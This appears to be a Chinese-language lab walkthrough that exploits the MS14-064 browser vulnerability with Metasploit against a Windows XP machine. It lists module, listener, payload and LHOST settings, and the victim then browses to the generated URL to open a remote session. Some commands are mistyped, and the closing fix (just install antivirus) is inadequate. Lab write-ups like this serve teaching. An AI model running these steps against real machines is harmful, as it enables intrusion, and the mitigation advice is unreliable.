网络安全渗透实战详细详解

第一篇在此平台发布实战内容，有多处不足请多指教，本次内容详解ms14-064漏洞利用与加固。

任务环境说明：

渗透机：Kali Linux

靶机：Microsoft Windows XP

渗透机IP：172.16.7.122

靶机IP：172.16.7.120

实验步骤实战

1.打开网络拓扑  进入msfconsole渗透测试平台

2.输入命令 search ms14-064 搜索模块，并用use 调节 输入此下面红色模块

3.输入 show options查看配置所需的参数

4.输入 set SRVHOST命令来设置本地监听的地址   注：SRVHOST监听 kali是不区分大小写的

 

5.输入 set SRVORT 设置本地监听端口

6.输入 set URIPATH 来设置所利用的网站路径

7.输入 set payload +攻击模块 来设置攻击

8.输入 set LHOST 来设置攻击机IP地址

9.输入set options最后重新查看所设置的参数 都设置完毕了没有

10.最后输入攻击命令 run或exploit来进行漏洞模块攻击

 11. run成功后已生成URL，本测试生成URL为：http://172.16.7.122:8080/

下面我们转到Windows XP这里  用ie浏览器输入已生成的URL 回车即可

 

12.我们重新切换到攻击机这里， 已经入侵成功了 我们随便输入几个命令来看一下，输入 dir 来显示当前目录内容

 

13.输入 sessions -i来查看当前活跃会话

 好了这是ms14-064的漏洞渗透实验，预防此漏洞 在系统中安装杀毒软件来加固自己的操作系统即可

本次实验结束，此文章经供参考，大家切勿利用做违法法律行为， 安全合理上网。